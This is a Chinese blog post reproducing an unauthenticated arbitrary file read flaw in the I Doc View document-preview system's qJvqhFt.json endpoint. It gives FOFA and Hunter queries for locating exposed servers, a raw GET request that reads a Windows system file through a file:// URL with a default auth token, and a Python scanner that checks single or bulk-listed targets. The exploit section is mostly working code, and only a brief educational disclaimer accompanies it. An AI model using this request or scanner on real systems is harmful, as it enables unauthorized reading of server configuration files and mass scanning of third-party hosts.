【漏洞复现】I doc view——任意文件读取

于 2024-06-29 05:00:00 发布
阅读量597 收藏 7
点赞数 10
分类专栏: 漏洞复现 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/140048331
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

I doc view 在线文档预览是一个用于查看、编辑、管理文档的工具。其qJvqhFt.json接口存在任意文件读取,未授权攻击者可以利用其读取网站配置文件等敏感信息。

漏洞复现

1)信息收集
fofa:title="在线文档预览 - I Doc View"
hunter:web.title="在线文档预览 - I Doc View"
在这里插入图片描述
世界如此美丽,值得去探索。
在这里插入图片描述
2)构造数据包

GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host: ip

在这里插入图片描述
代码解释:

  • start=1:这通常表示请求的分页参数,start=1可能意味着请求从第一项数据开始。size=5:这同样是一个分页参数,表示请求返回的数据量限制为最多5项。
  • file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini:解码后为file://C:/windows/win.ini,这个参数包含了一个文件的URL,格式为file://,后面跟着的是Windows系统中的文件路径。这里,它指向了Windows操作系统的win.ini配置文件。
  • idocv_auth=sapi:这可能是一个认证参数,用于验证请求的合法性。sapi可能是某种认证令牌或密钥。

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# 导入requests库,用于发送HTTP请求
import requests
# 导入argparse库,用于解析命令行参数
import argparse
# 导入time库,虽然在这段代码中未使用,但可能用于其他目的,比如等待或延迟
import time
# 从urllib3库导入InsecureRequestWarning,用于忽略SSL警告
from urllib3.exceptions import InsecureRequestWarning

# 定义打印颜色常量
RED = '\033[91m'  # 红色
RESET = '\033[0m'  # 重置颜色

# 忽略不安全请求的警告,避免在请求HTTPS时提示不安全警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 定义检查漏洞的函数
def check_vulnerability(url):
    try:
        # 去除URL末尾的斜杠,并构造完整的攻击URL
        attack_url = url.rstrip('/') + "/view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi"
        
        # 发送GET请求到攻击URL,不验证SSL证书,超时时间设置为10秒
        response = requests.get(attack_url, verify=False, timeout=10)
        
        # 检查HTTP响应状态码和响应体中的关键字,判断是否存在漏洞
        if response.status_code == 200 and 'fonts' in response.text:
            print(f"{RED}URL [{url}] 可能存在I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    # 捕获请求超时异常,提示可能存在漏洞
    except requests.exceptions.Timeout:
        print(f"URL [{url}] 请求超时,可能存在漏洞")
    # 捕获其他请求异常,打印错误信息
    except requests.RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

# 定义主函数,用于解析命令行参数并调用检查函数
def main():
    # 创建ArgumentParser对象,用于解析命令行参数
    parser = argparse.ArgumentParser(description='检测目标地址是否存在I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞')
    # 添加命令行参数,用于指定目标URL
    parser.add_argument('-u', '--url', help='指定目标地址')
    # 添加命令行参数,用于指定包含目标地址的文本文件
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    # 解析命令行参数
    args = parser.parse_args()

    # 如果指定了单个URL,则检查该URL是否存在漏洞
    if args.url:
        # 如果URL未以http://或https://开头,则添加http://前缀
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    # 如果指定了文件,则逐行读取文件中的URL并检查
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                # 如果URL未以http://或https://开头,则添加http://前缀
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

# 程序入口点
if __name__ == '__main__':
    main()

运行截图
在这里插入图片描述

Long._.L
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
I Doc View在线文档预览系统存在任意文件读取漏洞 附poc
nnn2188185的博客
12-18 534
I Doc View在线文档预览是一款在线文档预览系统,可以实现文档的预览及文档协作编辑功能。
java使用poi读取docdocx文件的实现示例
08-19
.doc格式的文件通常使用HWPFDocument类来读取,而.docx格式的文件则使用XWPFDocument类。 首先,要在项目中引入必要的依赖。如果使用Maven作为构建工具,可以在pom.xml文件中添加Apache POI相关依赖项。由于文章...
I Doc View在线文档预览系统任意文件读取漏洞复现
0xSec
12-14 1397
iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。
I Doc View 多个高危漏洞复现
fly夏天的博客
12-18 949
I Doc View 多个漏洞复现
I Doc View在线文档预览系统RCE漏洞复现(QVD-2023-45061)
0xSec
11-23 2483
远程未经身份验证的攻击者可通过构造特殊请求,目标应用将下载恶意文件,成功利用此漏洞可能在目标服务器上执行任意代码。
【1day】复现I Doc View系统upload接口任意文件读取漏洞
记录并分享学习安全的知识点..
12-11 1482
IDocV是一家跨国在线文档预览服务公司,为用户提供文档预览的功能。该公司提供第三方API,使开发者能够将其文档预览服务集成到自己的应用程序中。I Doc View系统upload接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
漏洞分析 | iDocView在线文档预览系统远程代码执行漏洞
WangsuSecurity的博客
12-20 1106
近期,网宿安全演武实验室监测到iDocView存在远程代码执行漏洞:远程攻击者可以利用该漏洞让目标应用下载恶意文件,最终获取服务器权限。
【1day】复现I Doc View系统upload接口任意文件上传漏洞
记录并分享学习安全的知识点..
12-05 687
IDocV是一家跨国在线文档预览服务公司,为用户提供文档预览的功能。该公司提供第三方API,使开发者能够将其文档预览服务集成到自己的应用程序中。I Doc View系统upload接口存在任意文件上传漏洞,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。
vb读取txt文件到textbox.doc
03-13
"VB 读取 txt 文件到 textbox" VB 读取 txt 文件到 textbox 是 VB 编程中的一种常见操作。VB 提供了多种方法来读取 txt 文件,其中包括使用 File 系统对象、TextStream 对象和 FileSystemObject 对象等。 使用 ...
DocView打造MFC的ActiveX控件
10-30
在MFC开发的ActiveX控件中加入单文档模板类,不多说了.源码面前无秘密
DocViewer(文档查看器)1.0.7免费绿色版
07-25
DocViewer可以快速查看各种帮助系统格式-iOSHELP、 AndroidHelp、 Xamlhelp、 SilverlightHelp 和 PhoneHelp,软件界面干净简洁,是用户办公的得力助手,需要的朋友快来下载使用吧。
android读取Word的Doc文件转为HTML格式
06-06
2. **读取DOC文件**:Apache POI提供了`HWPFDocument`类用于读取Word的DOC文件。以下是一个基本示例: ```java InputStream is = new FileInputStream("path_to_your_doc_file.doc"); HWPFDocument doc = new ...
SpringBoot读取配置文件常用方法解析
08-18
SpringBoot读取配置文件常用方法解析 SpringBoot 读取配置文件是指在 SpringBoot 项目中读取外部配置文件的方法,用于获取配置信息。下面将介绍 SpringBoot 读取配置文件的常用方法。 传统项目读取配置方式 在没有...
I DOC VIEW前台RCE分析
2301_80127209的博客
12-18 124
文件操作是十分敏感的操作,尤其是向服务器中下载文件,同时下载的文件最好也有固定的目录存放并防止目录穿越,开发者已经想到了下载文件的风险,但是却没有将对策做好,导致了本次漏洞。接口因为处理不当,导致可以远程读取任意文件,通过这个接口导致服务器下载恶意的JSP进行解析,从而RCE。但是下面做的操作就是本此漏洞的关键了,软件本意应该是想做一个比较完善的爬虫,所以接下会调用。前面的内容不是特别紧要,这里有一个去爬取页面的方法,也是唯一使用了。其实到上面这里还好,都是一些写文件的操作,并且写的也是。
I Doc View在线文档预览qJvqhFt.json接口存在任意文件读取漏洞
weixin_43567873的博客
03-04 58
I Doc View在线文档预览qJvqhFt.json接口存在任意文件读取漏洞
漏洞复现」I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞(XVE-2024-2115)
最新发布
qq_39894062的博客
06-13 776
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
I Doc View在线文档预览系统 cmd.json RCE漏洞复现
0xSec
12-24 1175
I Doc View在线文档预览系统 cmd.json 接口处存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
springboot 上传doc文件读取doc文件 代码
04-25
非常感谢您的提问!以下是一个简单的示例,演示如何使用Spring Boot上传一个doc文件,并读取它: ``` @RestController public class FileUploadController { @PostMapping("/uploadFile") public String uploadFile(@RequestParam("file") MultipartFile file) { if (file.isEmpty()) { return "请选择一个文件!"; } try { // 文件存储位置 String filePath = "D:/uploads/"; byte[] bytes = file.getBytes(); Path path = Paths.get(filePath + file.getOriginalFilename()); Files.write(path, bytes); return "文件上传成功!"; } catch (IOException e) { e.printStackTrace(); return "文件上传失败!"; } } @GetMapping("/readDocFile/{fileName}") public String readDocFile(@PathVariable("fileName") String fileName) { try { // 文件读取位置 String filePath = "D:/uploads/"; FileInputStream inputStream = new FileInputStream(filePath + fileName); XWPFDocument document = new XWPFDocument(inputStream); XWPFWordExtractor extractor = new XWPFWordExtractor(document); String text = extractor.getText(); return text; } catch (IOException e) { e.printStackTrace(); return "文件读取失败!"; } } } ``` 在上面的代码中,我们定义了一个名为`FileUploadController`的Spring Boot控制器,它包含两个路由:`/uploadFile`和`/readDocFile`。 `/uploadFile`路由接受一个名为`file`的文件参数,并将该文件保存到我们指定的路径中。如果文件为空,将返回一个错误消息。否则,我们将使用Java的`Files.write()`方法将文件写入磁盘。 `/readDocFile`路由将接受一个名为`fileName`的参数,并尝试将指定的doc文件读取到内存中。在此示例中,我们使用Apache POI库来实现此功能。`XWPFDocument`类用于解析doc文件的内容,`XWPFWordExtractor`类用于提取文本数据。 总的来说,这是一个非常简单的示例,但它演示了如何使用Spring Boot上传和读取doc文件。请注意,在实际生产环境中,您需要进行更多的错误处理、安全性检查和性能优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值